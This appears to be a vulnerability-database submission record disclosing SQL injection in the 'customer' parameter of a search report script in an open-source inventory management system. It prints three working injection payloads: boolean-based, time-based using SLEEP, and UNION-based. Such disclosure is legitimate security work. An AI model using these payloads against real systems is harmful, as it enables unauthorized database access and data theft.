| Title | SQL injection vulnerability exists in inventory management system |
|---|
| Description | SQL injection vulnerability exists in customer parameter of app/ajax/search_sell_paymen_report.php file of inventory management system
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: customer=1/(3*2-5) AND 8411=8411&issuedate=07/02/2023 - 07/31/2023
or
customer=1/(3*2-5) AND (SELECT 8075 FROM (SELECT(SLEEP(5)))HIim)&issuedate=07/02/2023 - 07/31/2023
or
customer=1/(3*2-5) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626a7071,0x4b626f70496f794d656f69534c586d745652616969506276706c436f42566548787a754247784769,0x7170627071)-- -&issuedate=07/02/2023 - 07/31/2023 |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/PUBLIC%20CVE%20HUB/Free%20and%20Open%20Source%20inventory%20management%20system%20-%20vuln%202.pdf |
|---|
| User | wuguanfengyue (UID 52312) |
|---|
| Submission | 08/09/2023 07:53 (3 years ago) |
|---|
| Moderation | 08/20/2023 08:50 (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 237558 [SourceCodester Inventory Management System 1.0 search_sell_paymen_report.php Customer sql injection] |
|---|
| Points | 20 |
|---|